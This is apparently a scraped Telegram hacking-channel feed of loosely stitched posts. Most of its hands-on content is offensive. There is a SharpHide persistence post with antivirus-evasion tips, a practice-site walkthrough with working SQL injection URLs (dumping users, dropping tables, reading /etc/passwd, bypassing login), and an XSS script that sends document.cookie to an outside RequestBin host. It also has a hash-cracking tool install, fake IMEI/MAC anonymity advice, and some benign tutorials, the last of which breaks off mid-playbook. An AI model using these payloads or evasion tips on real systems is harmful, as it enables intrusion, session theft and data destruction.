UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.5K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘This can hack any windows
🦟 SharpHide: a tool to create hidden registry keys

1) Malware that runs without elevated privileges in Windows has limited ability to recover from a system reboot (called persistence).

Malware that elevates privileges using zero-day exploits or public exploits has more potential to persist.

However, zero days are expensive and risk exposing them, and public exploits will not work on patched systems.

2) Most malware gets stuck using well known save methods that are easy to detect.

The easiest save method is to write the value to HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run (or a
similar key to HKEY_LOCAL_MACHINE).

3) The values ​​for this key are commands that Windows executes when the user logs on (in the case of HKEY_CURRENT_USER) or when it boots (in the case of HKEY_LOCAL_MACHINE).

The malicious program writes the path to its executable file into the Run key.

4) So it restores execution after reboot.

Since this is a well-known method, the suspicious value in the Run key is a red flag indicating that the system is infected.

It also reveals the location of malware on the system, making it very easy to collect samples for analysis.

5) FILE-FREE BINARY STORAGE

CONVENTIONAL STORAGE OF FILES ON DISK

Antivirus software scans files on the disk.

Antivirus software hashes files and sends signatures to the cloud.

Some antiviruses perform heuristic scans of files stored on the disk.

6) Suspected malware files can even be silently sent to the cloud.

To counter this, malware has several options.

Files on disk can be regular droppers that access the Internet and load more essential modules (which are loaded into memory without touching the disk).

Malicious programs can also create executable files that are stored on disk so as not to disable antivirus heuristics.

πŸ¦‘For example, because antivirus often scans high-entropy segments in PE (which indicate compressed or encrypted data), malware can avoid using encryption and compression to protect its executable files.

Since the antivirus has heuristics that scans the import tables, malware can avoid importing suspicious functions.

Such countermeasures are burdensome for malware developers and, in any case, do not guarantee that their binaries will not be uploaded to the cloud.

Download && Use
https://github.com/outflanknl/SharpHide#usage

@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘what is Browser hijacking ?

1) is a form of unwanted software that modifies a web browser's settings without a user's permission, to inject unwanted advertising into the user's browser. A browser hijacker may replace the existing home page, error page, or search engine with its own.

2) These are generally used to force hits to a particular website, increasing its advertising revenue.

3) Some browser hijackers also contain spyware, for example, some install a software keylogger to gather information such as banking and e-mail authentication details. Some browser hijackers can also damage the registry on Windows systems, often permanently.

Some browser hijacking can be easily reversed, while other instances may be difficult to reverse. Various software packages exist to prevent such modification.

4) Many browser hijacking programs are included in software bundles that the user did not choose, and are included as "offers" in the installer for another program, often included with no uninstall instructions, or documentation on what they do, and are presented in a way that is designed to be confusing for the average user, in order to trick them into installing unwanted extra software.

5) There are several methods that browser hijackers use to gain entry to an operating system. Email attachments and files downloaded through suspicious websites and torrents are common tactics that browser hijackers use.
wiki
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Web Hacking:

SQL Injection

XSS (Cross-Site Scripting)

Session Hijacking

1) git clone https://github.com/lambdacasserole/hack-this

2) cd hack-this

3) npm install
This will install Bower which will allow you to install the assets the website requires (Bootstrap, jQuery etc.) using the command:

4) bower install
Gulp will also have been installed. This will compile the Less and CoffeeScript into CSS and JS ready for production. Do this using the command:

gulp
This command will need running again every time you make a change to a Less file. If you're working on them, run gulp watch in a terminal to watch for file changes and compile accordingly.

5) Setup
To set everything up, you'll need to:

Import the file db.sql into your database

6) Modify the file db_configuration.php to correspond to your database
Access the site and get hacking

πŸ¦‘EXAMPLES:

1) SQL Injection
In an SQL injection attack, malicious SQL statements are inserted into an entry field for execution (usually in a data-driven web application).

Get information for all users:
http://localhost/customers.php?username=leocadio'%20or%20'1'='1
http://localhost/customers.php?username=leocadio'%20or%20''='
http://localhost/customers.php?id=1%20or%201=1
Drop (destroy) invoices table:
http://localhost/customers.php?id=1;drop%20table%20invoices
Dump the password hash file from the server:
Unix: http://localhost/customers.php?username='%20UNION%20SELECT%201,1,1,1,LOAD_FILE('/etc/passwd'),'1
Dump several things at once (oh boy):
http://localhost/customers.php?username='%20UNION%20SELECT%201,2,3,4,5,'hello%20world
Bypass Login (SQL Injection)
It's possible to bypass login completely (logging in as whoever you like) by adding an always-true condition to the password check:

foo' or '1'='1

2) Session Hijacking (XSS)
Using a service like RequestBin it's possible to hijack user sessions by capturing their session cookie. Try sending a message to a user consisting of the following code (with {{ bin_id }} substituted out for your RequestBin bin ID).

<script>
var xmlHttp = new XMLHttpRequest();
xmlHttp.open("GET", "http://requestbin.fullcontact.com/{{ bin_id }}?c=" + document.cookie, false);
xmlHttp.send(null);
</script>

@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ANOTHER GOOD HASH CRACKING:

F E A T U R E S :

auto detect hash
supports windows and linux platforms
fast decrypt
list of supported hashes:
- md4
- md5
- sha1
- sha224
- sha256
- sha384
- sha512
- ripemd160
- whirlpool
- mysql 3.2.3
- mysql 4.1
- mssql2000
- mssql2005
- nthash
- lmhash
- ntlm hash

πŸ„»πŸ„΄πŸ…ƒ'πŸ…‚ πŸ…‚πŸ…ƒπŸ„°πŸ…πŸ…ƒ :

$ apt update upgrade

$ apt install python2 git

$ git clone https://github.com/ciku370/hasher

$ cd hasher

$ python2 hash.py

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Cisco IP Phone Security Vulnerability.
#Vulnerabilities
Forwarded from UNDERCODE NEWS
Moxa MXView vulnerability can cause an attacker to execute arbitrary commands.
#Vulnerabilities
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Anonymous on Android, since nothing anonymous 100% some tips will help for android users:
(not emulators)

1) Disabling GPS and Location settings

2) Disabling pre-installed apps/ bloatware
You can disable these apps by going to Settings > Apps. On Android 5.0 or lower, you may need to swipe to β€˜ALL’ tab to see your system apps while on the higher Android version you can do so by tapping on the 3 dot menu on top right of your screen. Select the app you want to disable and then press the β€˜Disable’ button to disable it completely.


3) Disabling all Google stock applications
Just like Manufacturer apps you also get tons of pre-installed Google apps which hardly come in use any day. They occupy your system space, blocks your RAM memory, and also collects user data while running in the background.

4) Disabling Google keyboard permissions

5) you need root & fake imei & mac adress

6) Replacing some default Android Apps
Now, since we have opted out of all the Google services, we need an alternative for PlStoreore, Maps, Mail and so. Hence here we have compiled a list of all the privacy oriented apps that can be easily used as a replacement for the early ones.


7) install tor browser for using it

8) configure some good proxies
@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘why you should//Features of installing Kali Linux on a memory card :

Installing to a USB stick is similar to installing to an internal drive. But in order not to accidentally damage the main computer system, computer hard drives or the bootloader of the main system, I suggest installing Kali Linux on a USB flash drive in a virtual computer. After completing this installation, you will be able to boot from this flash drive in your real computer. I am using VirtualBox as my virtual computer .

There are two images available on the Kali Linux download page:

1) Installer - installation

2) Live - ISO from which you can download and work. You can also install from this image

3) In my method, I need a Live image to clean up a USB flash drive. But when installing from Live, there is no way to choose which components to install. In addition, the installation is done over the network. In general, we need two images at once: Installer (for installation) and Live to clean the flash drive.

I assume that you already have VirtualBox installed, or you yourself know how to install it.

4) In VirtualBox, create a new virtual machine. The most common virtual computer for Linux. The only difference is that it shouldn't have a (virtual) hard drive. If you have difficulty creating a virtual machine in VirtualBox, or have difficulties with other questions related to VirtualBox, then refer to the instructions " How to install Kali Linux (step by step instructions) ", there it is detailed and illustrated with screenshots.

5) configure some good proxies

@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
New Critical Vulnerability in Red Hat Enterprise Could allow attacker to crash the system.
#Vulnerabilities
FREE VIRTUAL NUMBER ANY AREA CODE 100% WORKING

@Numbers20Bot
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Types and behaviors of hackers According :
γ€€γ€€
1) To my understanding, "hackers" should be roughly divided into two categories: "positive" and "evil". Decent hackers rely on their knowledge to help system administrators find loopholes in the system and To be improved, and evil sect hackers use various hacking skills to attack, invade, or do other things harmful to the network, because evil sect hackers are engaged in things that violate the "Hacker Code", so their real names It is called "Cracker" instead of "Hacker", which is what we often hear of "Cacker" and "Hacker".

2) Regardless of the type of hacker, their initial learning content will be the content involved in this part, and the basic skills they master will be the same. Even if they each embarked on a different path in the future, they did the same thing, but the starting point and purpose were different.

3) Many people once asked me: "What do you usually do as a hacker?

Β» Isn't it very exciting?" Some people understand hackers as "doing boring and repetitive things every day." In fact, these are misunderstandings. Hackers usually need to spend a lot of time to learn. I don’t know if this process has an end or not. I only know "the more the better." Since learning hackers is entirely out of personal hobbies, there is no such thing as "boring"; repetition is inevitable, because "practice makes perfect". Only through constant contact and practice can one experience something that can only be expected and unspeakable.

4) In addition to learning, hackers should apply their knowledge to practice. No matter what kind of hackers do, the fundamental purpose is to master what they have learned in practice.

@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Create OpenSSL Certificate with Ansible :

1) When working with OpenSSL, public keys are derived from the corresponding private key.

The first step will always be to generate a private key using a specific algorithm.

2) For production use, you need a Certification Authority (CA) or Certification Authority that is responsible for signing a certificate that you can trust on the Internet.

Since we are talking about Dev and Lab use cases, we are creating a self signed certificate.

3) Create OpenSSL Certificate with Ansible
In the examples shown in this article, the private key is named hostname_privkey.pem, the certificate file is hostname_fullchain.pem, and the CSR file is hostname.csr, where hostname is the actual DNS for which the certificate was generated.
Before we start

$ sudo dnf install ansible

$ sudo yum -y install epel-release
$ sudo yum install ansible

$ sudo apt update
$ sudo apt install software-properties-common
$ sudo apt-add-repository --yes --update ppa:ansible/ansible
$ sudo apt install ansible

$ echo "deb http://ppa.launchpad.net/ansible/ansible/ubuntu trusty main" | sudo tee -a /etc/apt/sources.list
$ sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys 93C4A3FD7BB9C367
$ sudo apt update
$ sudo apt install ansible

$ pacman -S ansible
Confirm the Ansible installation by checking the version.

$ ansible --version
ansible --version
ansible 2.9.11
config file = None
configured module search path = ['/usr/share/ansible/plugins/modules']
ansible python module location = /usr/local/Cellar/ansible/2.9.11/libexec/lib/python3.8/site-packages/ansible
executable location = /usr/local/bin/ansible
python version = 3.8.5 (default, Jul 21 2020, 10:48:26) [Clang 11.0.3 (clang-1103.0.32.62)]
Install dependencies
pyOpenSSL is required to generate keys and certificates using Ansible.

$ sudo pip install pyOpenSSL

$ sudo pip3 install pyOpenSSL
Writing an Ansible playbook to generate a self signed certificate
With the dependencies installed, we need to start creating the certificate using Ansible.

We will make a single playbook with tasks for creating a private key, CSR and certificate.

I'll walk through each feature block by block, and later we'll combine everything to get a working playbook.

Create project folders:

$ mkdir -p ~/projects/ansible/{certificates,files,templates}
$ cd ~/projects/
$ tree
.
`-- ansible
|-- certificates
|-- files
`-- templates

4 directories, 0 files
Create a playbook template

$ vim ~/projects/ansible/openssl_certificates.yml
Add standard sections.
---
- hosts: localhost
vars:


@UndercodeTesting
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁